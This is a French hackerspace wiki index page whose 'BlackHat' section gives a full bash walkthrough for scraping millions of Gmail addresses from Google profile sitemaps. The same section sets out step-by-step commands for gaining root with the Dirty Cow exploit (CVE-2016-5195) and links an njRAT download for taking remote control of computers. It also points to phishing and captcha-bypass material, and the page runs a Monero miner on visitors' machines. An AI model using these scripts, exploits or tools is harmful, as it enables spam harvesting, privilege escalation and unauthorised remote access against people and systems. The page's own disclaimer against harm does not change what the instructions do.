Soutenir Vision du Web dans son partage de logiciels et de ressources libres

Ce mineur crée de la monnaie numérique Monero pour soutenir Vision du web.
Merci de désactiver votre bloqueur de publicité.
Aucune publicité ne sera affichée.
Le mineur utilise les ressources de votre machine pour créer gratuitement de la monnaie numérique.
Le montant des donations pour Vision du web est de 0.054633335171347 Monero.

Sommaire We make Hack

De Wiki. Analyse, Communication, Développement, Hacking.
Aller à : navigation, rechercher
Naviguer sur le site : Accueil du site - Les annuaires - Les éditoriaux - Le forum - Les outils - Les projets

Sommaire We make Hack

Les recherches collaboratives et travaux collaboratifs ouverts avec d'autres personnes et communautés.

OpenCV

OpenCV.

Installer Slackware

The Slackware Linux Project.
Site officiel : www.slackware.com
Documentation officielle : docs.slackware.com
Distribution Live : bear.alienbase.nl/mirrors/slackware/slackware-live/
Vos questions sur : www.linuxquestions.org/questions/slackware-14/

SIG et géolocalisation

ArcGIS logiciel SIG par Environmental Systems Research Institute

ArcGIS logiciel SIG par Environmental Systems Research Institute

3 formes de géolocalisation pour le web

1) GEOIP : une BDD externe qui jumelle ton IP a une région.
2) GOOGLE LOCATION : qui utilise un GPS pour identifier ta location spécifique et maintenant.
3) La géolocalisation HTML 5 : je ne connais pas sont fonctionnement pour identifier la géolocalisation.

Calculer des distances sur une carte de la route

Calculer des distances sur une carte de la route.

BlackHat

Bypass un captcha

La communauté BitcoinBlackHat propose un solveur de captcha.

Hacker avec Javascript

Hacker avec Javascript.

Le Phishing

Phishing avec PHP.

Le spam avec GMail

Une négligence de la part de Google découverte en 2011. En effet, il est possible de récupérer par le biais d'un sitemap l'ensemble des adresses des profils Google.
Celles-ci, bien que masquées par un ID, redirigent dans la plupart des cas, vers des adresses de la forme https://profiles.google.com/PSEUDOGMAIL ce qui permet à n'importe qui d'en déduire l'adresse Gmail rattachée au profil consulté.
Voici une méthode avec des commandes bash pour récupérer l'ensemble des 35 millions d'adresses Gmail.
Cette méthode nécessite un espace disque de stockage important. Compter 20 Go ou plus pour être sur de pouvoir télécharger l'ensemble des données.
Pour commencer, on récupère le fameux sitemap de Google :
mkdir google-urls-profile && cd google-urls-profile
wget --quiet http://www.gstatic.com/s2/sitemaps/profiles-sitemap.xml
On parse son contenu pour en extraire uniquement les URLs et on les télécharge :
cat profiles-sitemap.xml | grep "<loc>" | tr -d '\t' | sed 's/^<.*>\([^<].*\)<.*>$/\1/' > list.txt
for url in `grep http list.txt`; do wget --quiet $url; done; 
Au final, on se retrouve avec de nombreux fichiers Sitemap. Les regrouper en un seul fichier :
$ cat sitemap-*.txt > profile-urls.txt
La commande wc nous confirme que nous sommes bien en possession des 35 millions d'URLs pointant vers des profils Google.
$ wc -l profile-urls.txt
35 442 725 profile-urls.txt
Si on inspecte leur contenu, les adresses sont de la forme suivante :
https://profiles.google.com/1171359025719387936
https://profiles.google.com/1120069527109493321
Les données ne sont donc pas exploitables telles quelles, car le profil Google de chaque utilisateur est masqué par un ID (ex: 1171359025719387936) qui ne nous donne aucune indication.
Mais cette adresse redirige, dans la plupart des cas, vers https://profiles.google.com/PSEUDOGMAIL.
En fait, cela est vrai quand un utilisateur a activé le mode "user friendly" dans son compte.
Nous allons être obligés de tester l'ensemble des 35 millions d'URLs ce qui prend pas mal de temps, pour récupérer l'adresse qui se cache derrière cette redirection.
On peut le faire assez facilement avec ce script, nommé getmail.sh :
#!/bin/bash
for url in `cat $1`
do
curl --silent --head $url | grep "^Location:" >> getmail.txt
done
Appeller le script comme ça :
chmod +x getmail.sh
for file in `ls sitemap-*.txt`; do ./getmail.sh $file; rm -f $file; done; 
L'avantage de cette méthode est la suivante :
Si une adresse de profil ne possède pas de redirection, le champ "Location:" donné par la commande curl ne sera pas renseigné.
Cela permet de filtrer uniquement les adresses avec un pseudo Gmail valide.
Une fois le traitement terminé, il ne nous reste plus qu'à rajouter "@gmail.com" à la fin de chaque pseudo, pour construire une liste valide :
cat getmail.txt | awk -F'google.com/' '{print $2"@gmail.com"}' 
Dans ce cas précis, cette méthode a permis de construire une liste de 15 000 adresses Gmail en moins d'une heure.
Je me suis arrêté avant la fin, car je n'ai finalement aucun intérêt à collecter ce genre d'informations.
N'importe qui peut utiliser cette méthode pour constituer une liste d'adresses mail et la revendre à des spammeurs par exemple.
Par Sébastien Bilbeau, publié le 20 mai 2011 : http://www.tux-planet.fr/comment-recuperer-les-35-millions-dadresses-gmail/

Faille Cross-Site Scripting XSS

Source : https://fr.wikipedia.org/wiki/Cross-site_scripting

DNS Spoffing Attaque et contre attaque

Scanner de sécurité Nikto

Nikto est un scanner de sécurité pour les serveurs web, et est programmé en langage P.E.R.L. Ses fonctionnalités sont d'auditer vos serveurs web à la recherche de failles diverses, de tester potentiellement près de 6000 vulnérabilités CGI et fichiers dangereux, de vérifier l'obsolescence du serveur et ses composants logiciels, de rechercher les dossiers pouvant contenir des informations sensibles. 
Source : https://doc.ubuntu-fr.org/nikto

RAT

RAT : Remote Administration Tool - Outil d'administration à distance.

Créer un rat en Python

Créer un rat en Python.

Hacker et prendre le contrôle d'un ordinateur à distance avec njRAT

Hacker et prendre le contrôle d'un ordinateur à distance avec njRAT le 2 Mars 2017
Téléchargement njRAT version officielle: https://www.up-4ever.com/jfhzoobp9wvx
hack123

RAT - Informations complémentaires

Source : http://assiste.com.free.fr/p/abc/a/rat_remote_administration_tool.html

Avoir les privilèges de super utilisateur root sous GNU/Linux avec la faille Dirty Cow

Télécharger depuis Github un fichier  zip (CVE-2016-5195) qui nous permettra d'exploiter la faille Dirty Cow.
Source : https//github.com/gbonacini/CVE-2016-5195
cd Desktop             cette ligne de commande est pour naviger vers le bureau
cd CVE-2016-5195       cette ligne de commande est pour entrer dans le dossier CVE-2016-5195
id                     cette ligne de commande vous permettra de savoir que vous etes sous un simple compte utilisateur 
make                   la commande make sans arguments exécute la première règle du Makefile
./dcow                 cette ligne de commande est pour executer l'exploit de Durty Cow.
Après l’exécution de la dernière commande ./dcow , vous aurez pour résultat un mot de passe : "dirtyCowFun" qu'il faut saisir après la commande su après ça vous aurez les privilèges du super utilisateur.
Source : http://www.walidtech.com/2016/11/walidtech-hacking-linux-exploit.html

Politiques de transition écologique et économique

Politiques de transition écologique et économique.

Dictionnaire

Dictionnaire.

NAVIGATION

COMPRENDRE LA BLOCKCHAIN PAR LA PRATIQUE

Obtenir gratuitement de la cryptomonnaie sur internet : https://www.visionduweb.eu/forum/bitcoin/1597-gagner-des-bitcoins-miner-des-bitcoins

PARTICIPER ET PARTAGER

Vous êtes sur le HackerSpace de Vision du Web.
Les pages présentées sur le wiki évoluent tous les jours.
Certaines recherches sont peu abouties et incluent des erreurs.
Pour participer sur le wiki, créer un compte utilisateur en haut à droite.
Pourquoi utiliser GNU/Linux ? Y'a moins bien, mais, c'est beaucoup plus cher.
GNU/Linux, hackerspace, opensource, logiciels libres et transition écologique.
La recherche interne du wiki permet de trouver le contenu qui vous intéresse.
Les informations présentes sur cette page sont issues d'une recherche personnelle.
Identifiez-vous pour poser vos questions sur la page de discussion de VisionDuWeb.
Améliorer le contenu des pages en faisant des propositions depuis l'onglet discussion.
Pour écrire en Markdown : Éditeur - Générateur de tableau 1 - Générateur de tableau 2.
Vous pouvez partager les articles du wiki avec l'ensemble de la communauté des internautes.
Les recherches sur la sécurité servent à administrer et protéger votre système informatique.
Les informations du wiki ne doivent pas servir à nuire à autrui ou à un système informatique.
De nombreux outils gratuits sont listés et disponibles dans la boîte à outils de Vision du web.
D'autres pages du wiki peuvent correspondre à vos attentes. La liste de toutes les pages du wiki.

SOUTENIR VISIONDUWEB

Soutenir Vision du web avec des Bitcoins : 33ZsupGQr1rUmwj62HadcZ55hsGJajD9wN
Soutenir Vision du web avec des Bitcoins Cash : 15q5xAVFGpMbqgKsr8uhXymTv7kLfke7hq
Soutenir Vision du web avec des Bitcoins Gold : GNcVseSdiEGRzKYwZWeCbGGg1sZ6Nax172
Soutenir Vision du web avec des Bitcore (BTX) : 1Ks9FDF4FVauAHBCpBFKySiSmD8LaQhqDH
Soutenir Vision du web avec des Blackcoins : BKYBEhQGm9ExrYoWzbvmHA491sK2ArxFM6
Soutenir Vision du web avec des Bytecoins : 241LTEY5L3CSTN2afYf97obxGp4ahUYnq5jDwx5b15NQDothce8fpUeKA32X5SrJuDPBgXTsSmQRoAbCzcDvM2d2Pe9w6AY
Soutenir Vision du web avec des Clams : xMF9u1evuiN2zzEjg2KhgeYPcCLU84Ki5T
Soutenir Vision du web avec des Dash : Xd4vJFnWy27be8cLGSiXVYzP6nKFbdHATU
Soutenir Vision du web avec des Monero : 469EK3yr8JbNe3Gf1rXHD81zcHT7o1hTsDxqvWtxunnaTDLVNiXQ2NyWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm413rpYt
Soutenir Vision du web avec des Dogecoins : A64jhqCgsUyrUCPte6fV3BcG2Y7daH13Ym
Soutenir Vision du web avec des Ethereum : 0x0E4D6B7A1F88A56A1A66bf408c72FAE3d104D632
Soutenir Vision du web avec des Ethereum Classique : 0x633d83a4ab31e63d76d01edb660ecca4498ef8fa
Soutenir Vision du web avec des Litecoins : 3LKigW6TCS5MvXrZFGh8VMEtZf6MtE86iz
Soutenir Vision du web avec des Potcoins : PUYvjeJ3n2frypgD5yd95yNnwoztnZL5P3
Soutenir Vision du web avec des Solarcoins : 8aYbMcAL68U8f3c3o5pEKUKeWxx48gU1eq
Soutenir Vision du web avec des Zcash : t1Tkiv7nTt9Gwwui9ifsBdp37dTnRG7oYHp